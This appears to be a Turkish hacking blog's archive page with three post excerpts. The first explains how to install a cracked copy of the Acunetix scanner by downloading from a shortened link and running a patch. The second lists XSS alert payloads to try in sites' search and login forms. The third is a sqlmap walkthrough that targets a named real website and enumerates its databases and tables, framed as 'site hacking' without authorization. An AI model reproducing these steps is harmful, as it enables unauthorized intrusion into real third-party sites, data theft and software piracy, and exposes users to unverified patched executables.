Kayıtlar

Kasım, 2021 tarihine ait yayınlar gösteriliyor

Bedavaya acunetix kurma

-
Resim
Herkese merhaba. Bu yazımda sizlerle bir web zafiyeti bulma aracı olan Acunetix'i ücretsiz olarak kuracağız. Öncelikle acunetixin ne işe yaradığını açıklayalım.  Acunetix kendi içine enjekte edilmiş mevcut açıkları site üzerinde deneyerek, bulduğu açıkları tarama yapan kişiye, kuruma bildiren bir yazılımdır diyebiliriz.  Tıpkı Nessus aracında olduğu gibi Acunetix'te bir sitenin açıkları olup olmadığını tespit edip raporlama yapabilmektedir.  Yani gerçekten siteniz güvende mi değil mi sorusunun cevabını Acunetix vermektedir. Gelelim asıl konuya bu program ücretli peki ücretsiz bir şekilde nasıl indirebiliriz Öncelikle linke tıklayın: https://uzunversiyon.co/kPpuQ Şifre:  8drK0JRa_xAbHHUvfjl1mmNp3eMVTNwDTPpxlao3h00 Sonra masaüstüne çıkartıyoruz. Şimdi exe dosyasını çalıştırın. Sonra Patch içindeki dosyayı kopyalayıp yapıştırın. Şimdi dosyayı çalıştırın. Not: Değişik sesler çıkacak. İşlem tamam.  Diyelimki sitede sql açığı var nasıl sömürürsünüz. Linki bırakıy...
Yorum Gönder
Devamı

Xss açığı nasıl bulunur

-
Resim
Merhaba bugün size xss açığının nasıl bulunabileceğini göstereceğim. Hemen konuya geçelim uzatmaya gerek yok   xss açıkları için alert kodları var. Bunlar ; “><script>alert(‘xss’);</script>+ <title>XSS</title> javascript;alert(‘XSS’) “><script>alert(‘XSS’)</script> ‘><script>alert(‘XSS’)</script> {‘<script>alert(‘XSS’)</script> Bunları sitenin arama yerine, login formlarına yazıcaz. Hata verirse xss açığı vardır. Bunun gibi hata vermesi lazım. Takıldığınız yerlerde sosyal medyadan ulaşabilirsiniz.
Yorum Gönder
Devamı

Sqlmap Sql injection ile site hackleme

-
Resim
 Merhaba bu konumuzda sizlere sql injectionun nasıl yapıldığını anlatacağım. Kısa ve öz biçimde. Bunun için sqlmap-master aracını kullanacağız. Not: Asla Türk sitelerine saldırmayın. Öncelikle sqlmap aracımızı indirmemiz lazım. https://ay.live/aRNnZR bu adrese gidip indiriyoruz. Sonra zip'ten çıkartıp masaüstüne atıyoruz. Şimdi terminali açıp şunları yazın. cd desktop cd sqlmap-master Sonra hedef site bulalım.  http://www.astechnology.sm/fr.as/leggi-news-as-technology.php?id=21 ben bu siteyi buldum. Şimdi terminale şunları yazın. python sqlmap.py -u hedef url --dbs python sqlmap.py -u http://www.astechnology.sm/fr.as/leggi-news-as-technology.php?id=21 --dbs -u : url --dbs:Database Y/n gibi sorulara Y yazınız. Şimdi datayı çekelim. Şu komutu girin python sqlmap.py -u http://www.astechnology.sm/fr.as/leggi-news-as-technology.php?id=21 -D fa23ugad_astech --tables Burda fa23ugad_astech databasedeki tabloları getirmesini istiyoruz. --tables: Tabloları getir burda dik...
Yorum Gönder
Devamı